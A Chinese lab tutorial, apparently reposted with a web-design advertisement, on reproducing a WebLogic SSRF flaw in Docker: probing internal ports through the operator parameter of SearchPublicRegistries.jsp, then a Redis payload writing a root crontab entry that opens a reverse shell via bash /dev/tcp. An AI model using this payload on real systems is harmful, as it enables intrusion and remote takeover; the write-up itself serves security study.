如何实现WeblogicSSRF漏洞复现

今天就跟大家聊聊有关如何实现Weblogic SSRF漏洞复现,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

创新互联公司-专业网站定制、快速模板网站建设、高性价比望江网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式望江网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖望江地区。费用合理售后完善,十载实体公司更值得信赖。

一、使用docker搭建环境

docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

访问7001端口如何实现Weblogic SSRF漏洞复现

二、漏洞复现步骤

1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2、检查一下IBM这个地方看看

如何实现Weblogic SSRF漏洞复现

发现是个连接,这就可能存在ssrf了

3、使用burp suite抓包,点击Search

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

4、修改operator参数的连接

如何实现Weblogic SSRF漏洞复现

5、访问结果

访问不存在的端口返回 could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

访问存在的端口返回状态码

如何实现Weblogic SSRF漏洞复现

访问内网

如何实现Weblogic SSRF漏洞复现

利用redis反弹shell的payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

看完上述内容,你们对如何实现Weblogic SSRF漏洞复现有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注创新互联行业资讯频道,感谢大家的支持。


当前名称:如何实现WeblogicSSRF漏洞复现
网站网址:http://hbruida.cn/article/pspigp.html